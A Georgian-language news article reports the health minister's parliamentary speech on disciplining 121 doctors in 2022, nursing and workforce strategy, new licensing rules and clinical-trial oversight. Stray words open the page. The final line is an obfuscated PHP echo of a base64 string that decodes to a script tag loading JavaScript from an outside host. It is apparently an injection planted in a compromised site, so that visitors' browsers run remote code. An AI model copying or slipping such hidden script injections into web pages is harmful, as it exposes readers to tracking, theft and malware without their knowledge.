celsiusi
ავერსი შნაიდერი
„მხოლოდ 2022 წელს, ექიმთა პროფესიული განვითარების საბჭომ, 121 ექიმის პროფესიული პასუხისმგებლობის საკითხი დააყენა. მათგან, მძიმე გადაცდომების გამო, სერტიფიკატის მოქმედება უვადოდ შეუჩერდა 4 ექიმს. სხვადასხვა ვადით, სერტიფიკატის შეჩერება და დამატებითი ტრენინგის გავლა დაეკისრა 27 ექიმს, ხოლო წერილობითი გაფრთხილება მიეცა 62 ექიმს“, - განაცხადა ოკუპირებული ტერიტორიებიდან დევნილთა, შრომის, ჯანმრთელობისა და სოციალური დაცვის მინისტრმა, პარლამენტში, „მინისტრის საათის” ფარგლებში, სიტყვით გამოსვლისას.
 
ზურაბ აზარაშვილის განცხადებით, პაციენტების საჩივრებზე სწრაფი და ობიექტური რეაგირებისთვის, 2022 წელს, განახლებული სახით ჩამოყალიბდა ექიმთა პროფესიული განვითარების საბჭო. ამასთან, კიდევ უფრო ინტენსიური გახდა მისი მუშაობის რეჟიმი, რომ დროულად მოხდეს ყველა საჩივრის შესწავლა, დარგის სპეციალისტების რეცენზიების და კოლეგიალური განხილვის საფუძველზე. 
 
ზურაბ აზარაშვილმა, საკანონმდებლო ორგანოში, ევროპის საინვესტიციო ბანკთან თანამშრომლობით დაწყებულ, სამედიცინო პერსონალის პროფესიული განვითარების სტრატეგიაზეც ისაუბრა. მინისტრის განცხადებით, საექთნო პროფესიის გაძლიერება და ექიმების პროფესიული განვითარების სისტემის ფორმირება ჯანდაცვის ახალი სტრატეგიის მთავარი პრიორიტეტებია. 
„ბევრი სამედიცინო დისციპლინის მიმართულებით, აუცილებელია ახალგაზრდა კადრის დაინტერესება და მოზიდვა, რათა ქვეყანა არ დადგეს საექიმო სპეციალობების „დაბერების“ რისკების წინაშე“, - აღნიშნა ზურაბ აზარაშვილმა. 
 
მისივე განცხადებით, სამედიცინო მომსახურების ხარისხის უზრუნველსაყოფად, აქტიური მუშაობა მიმდინარეობს სამედიცინო და ფარმაცევტული საქმიანობის რეგულირების სააგენტოს სტრუქტურული რეორგანიზაციისა და ადამიანური რესურსით მისი გაძლიერებისთვის. 
 
როგორც ზურაბ აზარაშვილმა აღნიშნა, 2022 წლის დასაწყისში, მომზადდა და ძალაში შევიდა სანებართვო მოთხოვნები სტომატოლოგიურ სერვისებზე. მისივე თქმით, უკვე მზადდება და უახლოეს პერიოდში, ძალაში შევა სანებართვო პირობები დამხმარე რეპროდუქციული ტექნოლოგიების გამოყენების და ამბულატორიულ პირობებში, სხვადასხვა მაღალი რისკის პროცედურების ჩატარების თაობაზე. 
 
„აღმოსავლეთ ევროპის რეგიონში საქართველო ერთ-ერთი მოწინავე ქვეყანაა, სადაც აქტიურად ხორციელდება კლინიკური კვლევები. კლინიკურ კვლევებში ჩართვა ერთის მხრივ, ქმნის უნიკალურ შესაძლებლობას, საქართველოს მოქალაქეებისთვის ჰქონდეთ ადრეული წვდომა სასიცოცხლო მნიშვნელობის მედიკამენტებზე. თუმცა, ამავდროულად, მნიშვნელოვანია ბიოსამედიცინო კვლევების მარეგულირებელი ჩარჩოს დახვეწა და ევრო დირექტივებთან მისი შესაბამისობის სრულად უზრუნველყოფა. რეგულირების სააგენტომ, უკვე დაიწყო მუშაობა მიმდინარე კლინიკური კვლევების მონიტორინგის გაძლიერებაზე და უახლოეს პერიოდში, მომზადდება განახლებული მარეგულირებელი ჩარჩო, საერთაშორისო სტანდარტების შესაბამისად“,  - განაცხადა ზურაბ აზარაშვილმა. 
 
 
655
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");